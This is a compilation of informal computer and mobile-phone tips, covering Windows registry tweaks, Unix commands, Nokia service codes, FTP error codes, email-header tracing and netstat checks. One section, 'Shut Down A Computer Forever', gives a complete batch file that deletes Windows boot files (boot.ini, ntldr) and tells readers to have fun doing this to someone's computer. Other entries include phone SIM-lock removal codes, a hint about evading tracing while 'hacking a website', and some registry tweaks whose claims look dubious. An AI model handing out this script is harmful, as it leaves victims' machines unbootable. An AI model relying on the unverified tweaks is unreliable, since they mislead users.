Open cmd From Right Click Menu

Often, when using Windows Explorer, I want to open the command prompt at the folder that's my current location. That takes too many steps: opening a command prompt and then navigating to my current folder.

However, there's a quicker way: add an option to the right-click context menu that will open a command prompt at your current folder. For example, if you were to right-click on the C:\My Stuff folder, you could then choose to open a command prompt at C:\My Stuff.

To add the option, run the Registry Editor, then go to HKEY_LOCAL_MACHINE/Software/Classes/Folder/Shell. Create a new key called Command Prompt. For the default value, enter whatever text you want to appear when you right-click on a folder—for example, Open Command Prompt. Create a new key beneath the Command Prompt key called Command. Set the default value to Cmd.exe /k pushd %L.

That value will launch Cmd.exe, which is the XP command prompt. The /k switch puts the prompt into interactive mode. That is, it lets you issue commands from the command prompt; the command prompt isn't being used to issue only a single command and then exit. The pushed command stores the name of the current directory, and %L uses that name to start the command prompt at it. Exit the Registry.

The new menu option will show up immediately. Note that it won't appear when you right-click on a file; it shows up only when you right-click on a folder.

Unix Bible

awk: Search for a pattern within a file. Includes
a built-in programming language.

bdiff: Compares two large files.

bfs: Scans a large file.

cal: Displays a calendar.

cat: Concatenates and prints files.

cc: C compiler.

cd: Change directory.

chgrp: Changes a file's group ownership.

chmod: Changes a file's access permissions.

chown: Changes the individual ownership of a file.

cmp: Compares two files; diplays the location (line
and byte) of the 1st difference between these.

comm: Compares two files so as to determine which
lines are common to both.

cp: Copies a file to another location.

cu: Calls another UNIX system.

date: Returns the date and time.

df: Displays free space in the file system.

diff: Displays the differences between two files
or directories.

diff3: Displays the differences between three files
or directories.

du: Reports on file system usage.

echo: Displays its argument.

ed: Text editor.

ex: Text editor.

expr: Evaluates its argument which is generally
a mathematical formula.

f77: FORTRAN compiler.

find: Locates the files w/ specified characteristics.

format: Initializes a floppy disk.

grep: Searches for a pattern within a file. (see awk)

help: Salvation.

kill: Ends a process.

ln: Used to link files.

lpr: Copies the file to the line printer.

ls: Displays info. about one or more files.

mail: Used to receive or deliver e-mail.

mkdir: Creates a new directory.

more: Displays a long file so that the user
can scroll through it.

mv: Used to move or rename files.

nroff: Used to format text.

ps: Display a process's status.

pwd: Display the name of the working directory.

rm: Removes one or more files.

rmdir: Deletes one or more directories.

sleep: Causes a process to become inactive for a
specified length of time.

sort: Sort and merge one or more files.

spell: Finds spelling errors in a file.

split: Divides a file.

stty: Display or set terminal parameters.

tail: Displays the end of a file.

troff: Outputs formatted output to a typesetter.

tset: Sets the terminal type.

umask: Allows the user to specify a new creation
mask.

uniq: Compares 2 files. Finds and displays lines
in one file that are unique.

uucp: UNIX-to-UNIX execute.

vi: Full screen editor.

wc: Displays details in the file size.

who: Info. on who else be online.

write: Used to send a message to another user.

CDMA Codes

Nokia 3280, 3285, 3580, 3585, 5185, 6185, 8280, etc
Name Set*3001#12345#
Software Version: *#837#
Software Version: *#9999#
Esn Number: *#92772689#
Restart Phone: *#75681#
Restart Phone: *#75682#

Nokia 8887
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#8378#
Esn/Data/Timer: *#92772689#
SID: *#743#

Nokia 8587
Name Set: *#626#7764726#
A-Key: #8159357022#4579# (26 digits)
A-Key: #8159357022#4547# (20 digits)
Version: *#0000#
Version: *#837#
Vocoder: *#3872#
Change language: Menu 5, 3, 1
Change DM mode: *#7678#
Debug Screen: *#8378#
Debug: *#8380#
Field Test Menu: *#83788#

Unlock Password Protected Memory Card

Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked. This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.

2. Browse through the directory, C:\system

3. Rename the file mmcstore to mmcstore.txt

4. Open the file - The file will open in Notes.

5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.

Talk To Gtalk Friends From Yahoo

1. Add gtalk2voip011 to your message list.
2. Its a bot so don't say hi hello or whatever.
3.Then send message to Gtalk user type IM gtalk:< hisid@gmail.com > <>
4. Then u will get error Like the person is not online or something like that.
5. But the request to add will be sent to him, as soon as he accepts it, u will be able to talk with him with this command , and he/she can reply by simply typing the message.
Tip: press up arrow to prevent typing command again and again
Here is official site hxxp://www.gtalk2voip.com

Play A Game In MS Excel

1.Open Ms Excel

2.In the First Cell of THe Worksheet press spacebar and then on the file menu clik on "Save As Web page"

3.Click On THe Selection Sheet Radio button and then click on "add interactively"...

4.Save the File

5.open the file ull see a Excel Sheet....

6.With the Help of Page Down on ur keyboard point to Row Number 2000

7.Then Point to Column "WC"

8.Go To the Column WC such That It is on the extreme left of ur screen

9.Click on 2000 Such that whole row is selected

10.While Pressing CTRL+ALT+SHIFT CLik on The "Microsoft office" Logo on the same sheet on the extreme left of your Sheet....

11.There u r with your game.....

Change The Color Of Yahoo Messenger

To change the background color of the buddy list.
For the skin you are using, look inside the skin folder, located in

C:\Program Files\Yahoo!\Shared\Graphics.

Find the "skin_name".xml file, where "skin_name" is the name of the skin, and open it using notepad or wordpad.

Find this line:
Change the x's to the hex value of the color you want to use. Save the changes to the .xml file.

You will need to exit and restart messenger for this to appear properly. you can do a search for hex values and copy them to the "xxxxxxx" field
More Hex Colour Codes ==========>

hxxp://www.december.com/html/spec/colorchips.html

***replace hxxp with http***

Shut Down A Computer Forever

Open up notepad and copy and paste the below lines. Save it as a .bat file. Say Doom.bat.

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. HAVE FUN.

***CLICK THE FILE AT YOUR OWN RISK***

MS Word Trick

Open MS Word Document, and type,
=rand(200,99)
Hit enter.................What happened.......
I guess a story has popped up lasting up to several pages. Ha ha ha

Turn On Your PC In 10 seconds

Click on the start button then press R it will take u to Run well go to run and type regedit press enter this will open Registery Editor now look for the key, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\ContentIndex now there find the Key Called "Startup Delay" Double Click On It Now where its Base Click DecimalNow its Default Value Is 4800000 (75300:hexadecimal) Change The Value To 40000. Here you go, you have done it now close the Registery Editor and Restart Your ComputerYou'll See The Result.

Chatting From Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! By this method all the conversations are secured...(means no monitoring). All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:

@echo off

:A

Cls

echo MESSENGER

set /p n=User:

set /p m=Message:

net send %n% %m%

Pause

Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see,

MESSENGER

User:

After "User" type the IP address of the computer you want to contact.After this, you should see this,

Message:

Now type in the message you wish to send.Before you press "Enter" it should look like this,

MESSENGER

User: 56.108.104.107

Message: Hi

Now all you need to do is press "Enter", and start chatting!

Have Fun

Your Name At The Time Tab

Go to Control Panel,
In that regional settings,
Go To Regional and Language option,
Click onCustomize button,
Now go to the time tab,
and write whatever you want to be the sybol of AM and PM.
Apply and Ok.
You will see the name at the right bottom.

Speed Up Your FireFox

1. Type "about :config" in the adress field.

2. Set the value of network.http.pipelining to "true".

3. Set the value of network.http.pipelining.maxrequests to "100".

4. Set the value of network.http.proxy.pipelining to "true"

5. Set the value of nglayout.initialpaint.delay to "0" (not availible in newer versions)

Google Search

inurl: like allinurl, but only for the next query word.
allintitle: shows only results with terms in title.
intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.
cache:url will show the Google version of the passed url.
info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
spell: will spell check your query and search for it.
stocks: will lookup the search query in a stock index.
filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.
daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.
maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.
phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)
"site:www.somesite.net "+www.somesite.+net"(tells you how many pages of your site are indexed by google)
allintext: searches only within text of pages, but not in the links or page title
allinlinks: searches only within links, not text or title.

Rename Recycle Bin

1. Start, Run, 'Regedit'.

2. Press 'Ctrl'+'F' to open find box and type 'Recycle Bin' to search.

3. Change any value data with 'Recycle Bin' to whatever name you want to give it ( ie, like 'Trash Can' or 'Dump' etc).

4. Press F3 to continue searching for 'Recycle Bin' and change wherever you come across 'Recycle Bin' to new its new name.

5. Repeat step 4 until you have finished with searching and changed all values to its new name.

6. Close regedit and hit F5 on desktop to see the new name on screen.
Note: As a good practice, always backup your registry before changing anything although changing 'Recycle Bin' name is a simple tweak and doesnt affect anything else.

Regedit.exe & Regedt32.exe

Have you ever noticed that there are two versions of the Registry Editor on your computer? Ever wondered why? Well let me just give you a little insight!
It all depends on your Operating System. If you have Windows 2000 :

Regedit.exe
Regedit.exe is included with Windows NT 4.0 and Windows 2000 primarily for its search capability. You can use Regedit.exe to make changes in the Windows NT 4.0 and Windows 2000 registry, but you cannot use it to view or edit all functions or data types on Windows NT 4.0 and Windows 2000.

The following limitations exist in the Regedit.exe version that is included with Windows NT 4.0 and Windows 2000:
You cannot set the security for registry keys.You cannot view, edit, or search the value data types <>REG_EXPAND_SZ and <>REG_MULTI_SZ. If you try to view a <>REG_EXPAND_SZ value, Regedit.exe displays it as a binary data type. If you try to edit either of these data types, Regedit.exe saves it as <>REG_SZ, and the data type no longer performs its intended function.

You cannot save or restore keys as hive files.Microsoft recommends that you use Regedit.exe only for its search capabilities on a Windows NT 4.0-based or Windows 2000-based computer.

Regedt32.exe
Regedt32.exe is the configuration editor for Windows NT 4.0 and Windows 2000. Regedt32.exe is used to modify the Windows NT configuration database, or the Windows NTregistry. This editor allows you to view or modify the Windows NT registry.The editor provides views of windows that represent sections of theregistry, named hives. Each window displays two sections. On the leftside, there are folders that represent registry keys. On the right side,there are the values associated with the selected registry key. Regedt32 isa powerful tool, and you must use it with extreme caution when you changeregistry values. Missing or incorrect values in the registry can make theWindows installation unusable.

Note: Unlike Regedit.exe, Regedt32.exe does not support importing and exporting registration entries (.reg) files.

Windows XP and Windows Server 2003

Regedit.exe
Regedit.exe is the configuration editor for Windows XP and Windows Server 2003. Regedit.exe is used tomodify the Windows NT configuration database, or the Windows NTregistry. This editor allows you to view or modify the Windows NT registry. It supports setting security on registry keys, viewing and editing <>REG_EXPAND_SZ and <>REG_MULTI_SZ, and saving and restoring hive files.On the leftside, there are folders that represent registry keys. On the right side,there are the values associated with the selected registry key. Regedit is a powerful tool. You must use extreme caution when you use it to change registry values. Missing or incorrect values in the registry can make the Windows installation unusable.
Regedt32.exe
In Windows XP and Windows Server 2003, Regedt32.exe is a small program that just runs Regedit.exe.

Partitioning Your HardDisk

Partitioning involves creating logical units on your hard drive that are then addressed as different drive letters. Not only does it help to organize your data (program files on one drive, games on another, documents on another) but also to speed up your PC. This is so because the drive head has to move a lesser distance for accessing data within one partition. You can also have different filesystems and OSs on the same hard drive.
Partitioning can be done using ‘fdisk’ in DOS/Windows 9x or ‘disk management’ in Windows 2000/ NT/XP. We will describe the procedure for fdisk, since disk management is GUI driven and the basics otherwise remain the same. While several other commercial packages like Partition Magic are available, these utilities (fdisk, computer management) are bundled with their respective OSs. You need a bootable floppy with fdisk.exe, format.com, and sys. com utilities. Before starting, decide how many partitions you want to create and their sizes. You can create one primary and one extended partition using the DOS fdisk. The extended partition can then have multiple logical partitions. Boot your machine using the bootable disk, and do the following.
Run fdisk. The utility will show you a numbered menu from where you can create, view, or delete partitionsThe utility first asks you whether you want to enable large disk support. Type Y (for yes) and press enter if your hard-drive capacity is more than 4 GB. Large disk support creates a FAT32 partition, which can be greater than 2 GBSelect the first option from fdisk menu to create a primary partition. Specify the partition size in megabytes or percentage size when prompted for it. Similarly, create an extended partition. Extended partitions by themselves do not appear as drive letters. Instead, logical partitions must be created in them, which are then assigned drive lettersExit fdisk and reboot the computerFdisk automatically assigns drive letters to all the partitions. You’ll need to format each partition in order to use it. Use format.com for the sameYour hard drive is now ready for taking an OS.

See Hidden Files Using DOS

At command prompt just type,
dir /ah
I the list is too long u can use,
dir /ah/p/w

Make Your Own Radio Station

::Must HAVE Winamp (Any Version)::

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have a lot of latency, just dnt bother).

Second, your going to have to have a domain, an updated one with the current IP active. (Could be anything e.g. My sig)
Now, Your gonna have to download the Shoutcast Files.
Go to wxw.shoutcast.com to get the files.
Ok After downloading these, installing Both of them in any order. Go to START>PROGRAM FILES>SHOUTCAST DNAS>EDIT SHOUTCAST DNS CONFIG.
Ok your gonna have to Configure it:

Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember).

The Portbase: change it to whatever port you want it Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.
Then EDIT and SAVE.
Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.
Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through wxw.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.
Then go to Encoder, and choose your quality of your music. Go back to OUTPU>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.
Now Connect. to check that your Radio is on-line go to http://(your address that you added in the prefrence).

Common ftp Error Codes

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed. Logged out if appropriate.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information
421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken.
451 Requested action aborted. Local error in processing.
452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted. Page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Add The Open cmd prompt To Folder Context Menus Also To Drives And To My Computer

Copy what's in the code area to notepad and save as cmd here.reg where ever you want,
CODE
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\Drive\shell\cmd]@="Command Prompt"
[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]@="cmd.exe /k \"cd %L\""
[HKEY_CLASSES_ROOT\Directory\shell\cmd]@="Command Prompt"
[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]@="cmd.exe /k \"cd %L\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]@="Command Prompt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]@="cmd.exe /k \"cd %L\""

Thats it your done.

Backtracking Email Messages

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.
So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .
If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.
Below are listed the headers of an actual spam message I received. I've changed my email addressand the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.
Return-Path: <hunkforu@yahoo.com>
X-Original-To: siddhu@example.com
Delivered-To: siddhu@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108]) by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7for <siddhu@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>From: "Maricela Paulson" <hunkforu@yahoo.com>Reply-To: "Maricela Paulson" <hunkforu@yahoo.com>To: siddhu@example.comSubject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...ishaDate: Sun, 16 Nov 2003 19:42:31 +0200X-Mailer: Internet Mail Service (5.5.2650.21)X-Priority: 3MIME-Version: 1.0Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
According to the From header this message is from Maricela Paulson at hunkforu@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.
The header most likely to be useful in determining the actual source of an email message is the Received header.According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.
The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.
Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking. When you get the IP of the person who sent the mail, just enter the IP in geocities.com. You will know from which country or area it came up from.

Listen To FM On Gtalk

FM is on your GTalk (Teen Taal 110.,only hindi).
For this u need to follow these steps...,
1) add this id in ur GTalk: service@gtalk2voip.com
2) then add: 110@radio.gtalk2voip.com
After completion of these 2 110@radio.gtalk2voip.com
Then make a call to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station.

LIST OF AVAILABLE RADIO STATIONS:
100 - Classic Country Music from Heartland Public Radio [hxxp://128.177.3.80:4064/]
101 - Cowboy Cultural Society Radio - an American tradition since 2002 [hxxp://205.188.215.232:8028/]
102 - Atlantic Sound Factory - ASF Radio [hxxp://69.31.50.146:80/]
103 - 100.7 Jack FM, San Diego [hxxp://38.116.132.31:9024/]
104 - 102.7 FM The Fringe [hxxp://64.72.124.89:8134/]
105 - 181.fm - The Buzz (Your Alternative Station!) [hxxp://scfire-nyk0l-1.stream.aol.com:80/stream/1022]
106 - 181.fm - The Mix Channel (70s, 80s, 90s and Today's Best Music) [hxxp://208.53.158.167:8032/]
107 - 181.fm - The Eagle (Your Home For REAL Classic Rock!) [hxxp://208.53.158.126:8030/]
108 - .977 The 80s Channel [hxxp://scfire-ntc0l-2.stream.aol.com:80/stream/1040]
109 - 1.FM - Channel X [hxxp://209.51.161.54:8072/]
201 - KCRW World News [hxxp://scfire-ntc0l-2.stream.aol.com:80/stream/1047]202 - Sporting News Radio [hxxp://scfire-chi0l-2.stream.aol.com:80/stream/1057]203 - KPFK - Southern California's 90.7 FM News, Talk & Music [hxxp://64.27.31.66:80/]
204 - WBUR 90.9 FM, Boston's NPR News Station [hxxp://205.234.188.21:80/]

Hide Your Files In An Image

All you need is WinRAR INSTALLED ON Windows XP.

Gather all your files.

Now add those files in a RAR Archive.

For example Secret.rar.

Now copy the RaR file to a folder.

For Example : C:/hidden/.

Now copy any image which is in JPEG format to the same folder above.

For Example logo.jpg.

Now Open MS-DOSStart > Run type "cmd" without quotes.

In Dos window something like this should be written like

"Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

"to change it to C:/Hidden/type "cd\" without quotes.

Then type "cd hidden" without quotes.

then type this COPY /b logo.jpg + secret.rar output.jpg.

Now you will see a output.jpg in that "C:\Hidden\" folder.

Now only winrar can open it.

How Cool Was That

Mobile Phone's Must Know Secret Codes

:: NOKIA :: Universal CodesCode Description

These Nokia codes will work on most Nokia Mobile Phones
(1) *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370#
(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.
(5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type.
(6) *#9999# Phones software version if *#0000# does not work.
(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number).
(8) #pw+1234567890+ 1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(9) #pw+1234567890+ 2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(10) #pw+1234567890+ 3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(11) #pw+1234567890+ 4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(12) *#147# (vodafone) this lets you know who called you last.
(13) *#1471# Last call (Only vodofone).
(14) *#21# Allows you to check the number that "All Calls" are diverted to
(15) *#2640# Displays security code in use.
(16) *#30# Lets you see the private number.
(17) *#43# Allows you to check the "Call Waiting" status of your phone.
(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.
(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.
(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.
(21) *#67705646# Removes operator logo on 3310 & 3330.
(22) *#73# Reset phone timers and game scores.

(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best stand by time possible.

(24) *#7760# Manufactures code.

(25) *#7780# Restore factory settings.

(26) *#8110# Software version for the nokia 8110.

(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair(0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off and then on again.

(28) *#94870345123456789 # Deactivate the PWM-Mem.

(29) **21*number# Turn on "All Calls" diverting to the phone number entered.

(30) **61*number# Turn on "No Reply" diverting to the phone number entered.

(31) **67*number# Turn on "On Busy" diverting to the phone number entered.

(32) 12345 This is the default security code.

Press and hold # Lets you switch between lines

IMEI number: * # 0 6 #

Software version: * # 0 0 0 0 #

Simlock info: * # 9 2 7 0 2 6 8 9 #

Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]

Half Rate: * 4 7 2 0 #

Provider lock status: #pw+1234567890+ 1

Network lock status #pw+1234567890+ 2

Provider lock status: #pw+1234567890+ 3

SimCard lock status: #pw+1234567890+ 4

FOR NOKIA 6110/6120/6130/ 6150/6190

IMEI number: * # 0 6 #

Software version: * # 0 0 0 0 #

Simlock info: * # 9 2 7 0 2 6 8 9 #

Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]

Half Rate: * 4 7 2 0 #

FOR NOKIA 3110

IMEI number: * # 0 6 #

Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #

Simlock info: * # 9 2 7 0 2 6 8 9 #

FOR NOKIA 3330

*#06# This will show your warranty details.

*3370# Basically increases the quality of calling sound, but decreases battery length.

#3370# Deactivates the above.

*#0000# Shows your software version.

*#746025625# This shows if your phone will allow sim clock stoppage.

*#7780# Manufacturer Info Date of Manufacturing.

FOR Samsung SGH600/2100DB

IMEI number: * # 0 6 #

Software version: * # 9 9 9 9 # albo * # 0 8 3 7 #

Net Monitor: * # 0 3 2 4 #

Changing LCD contrast: * # 0 5 2 3 #

Memory info: * # 0 3 7 7 # albo * # 0 2 4 6 #

Reset pamieci (SIMLOCK`a removing!!!) : *2767*3855#

Reset pamieci CUSTOM: *2767*2878#

Battery state: * # 9 9 9 8 * 2 2 8 #

Alarm beeper: *#9998*289#

Vibration test: *#9998*842#

Change The Location Of Your My Documents

I just found out about this long back, This is for newbies on PC's. I use Windows XP for some time now, so i guess there are others out there who don't know about this yet.
But normally windows saves the "My Documents" folder on your C-drive. But when you right-click on it and go to properties, you can change the location where you want windows to save your Documents folder.I have a partition set up with just windows on it, and all my things i want to keep are on different partitions/disks. So now I put My Documents on another partition than where I have windows installed. If windows screws up and you have to format your C-drive again, your documents will be spared at least......

Change Your IP In Less Then A Minute

1. Click on "Start" in the bottom left hand corner of screen

2. Click on "Run"

3. Type in "command" and hit ok.
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"

5. Type "exit" and leave the prompt

6. Right-click on "Network Places" or "My Network Places" on your desktop.

7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"

9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab

10. Click on "Use the following IP address" under the "General" tab

11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

13. Hit the "Ok" button here

14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.

16. Go back to the "TCP/IP" settings

17. This time, select "Obtain an IP address automatically"tongue.gif

18. Hit "Ok"

19. Hit "Ok" again

20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:

This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Check DOS To Know If You Are Infected

When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),open a MS-DOS Prompt window (start/programs MS-DOS Prompt).Then type netstat -arn and press the Enter key.Your screen should display the following (without the dotted lines which I added for clarification).

-------------------------------------------------------------------------------------------------

Active Routes:
Network Address Netmask Gateway Address Interface Metric

127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1

255.255.255.255 255.255.255.255 255.255.255.255 0.0.0.0 1
Route Table
Active Connections
Proto Local Address Foreign Address State
-------------------------------------------------------------------------------------------------

If you see anything else, there might be a problem (more on that later).Now dial into your ISP, once you are connected;go back to the MS-DOS Prompt and run the same command as beforenetstat -arn, this time it will look similar to the following (withoutdotted lines).

Active Routes:
Network Address Netmask Gateway Address Interface Metric

0.0.0.0 0.0.0.0 216.1.104.70 216.1.104.70 1

127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1

216.1.104.0 255.255.255.0 216.1.104.70 216.1.104.70 1

216.1.104.70 255.255.255.255 127.0.0.1 127.0.0.1 1

216.1.104.255 255.255.255.255 216.1.104.70 216.1.104.70 1

224.0.0.0 224.0.0.0 216.1.104.70 216.1.104.70 1

255.255.255.255 255.255.255.255 216.1.104.70 216.1.104.70 1

Route Table
Active Connections
Proto Local Address Foreign Address State

TCP 0.0.0.0:0 0.0.0.0:0 LISTENING

TCP 216.1.104.70:137 0.0.0.0:0 LISTENING

TCP 216.1.104.70:138 0.0.0.0:0 LISTENING

TCP 216.1.104.70:139 0.0.0.0:0 LISTENING

UDP 216.1.104.70:137 *:*

-------------------------------------------------------------------------------------------------

What you are seeing in the first section (Active Routes) under the heading ofNetwork Address are some additional lines. The only ones that should be thereare ones belonging to your ISP (more on that later). In the second section(Route Table) under Local Address you are seeing the IP address that your ISPassigned you (in this example 216.1.104.70).
The numbers are divided into four dot notations, the first three should bethe same for both sets, while in this case the .70 is the unique numberassigned for THIS session. Next time you dial in that number will more thanlikely be different.
To make sure that the first three notation are as they should be, we will runone more command from the MS-DOS window.From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .netor whatever it ends in. Following is an example of the output you should see.

-------------------------------------------------------------------------------------------------
Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops: 1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4] 2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1] 3 108 ms 116 ms 119 ms wxw.motion.net [207.239.117.112]Trace complete.
-------------------------------------------------------------------------------------------------

You will see that on lines with the 1 and 2 the first three notations of theaddress match with what we saw above, which is a good thing. If it does not,then some further investigation is needed. If everything matches like above, you can almost breath easier. Another thingwhich should you should check is programs launched during startup. To findthese, Click start/programs/startup, look at what shows up. You should beable to recognize everything there, if not, once again more investigation is needed.

Now just because everything reported out like we expected (and demonstratedabove) we still are not out of the woods. How is this so, you ask? Do you useNetmeeting? Do you get on IRC (Internet Relay Chat)? Or any other programthat makes use of the Internet. Have you every recieved an email with anattachment that ended in .exe? The list goes on and on, basically anythingthat you run could have become infected with a trojan. What this means, isthe program appears to do what you expect, but also does just a little more.This little more could be blasting ebay.com or one of the other sites thatCNNlive was talking about.
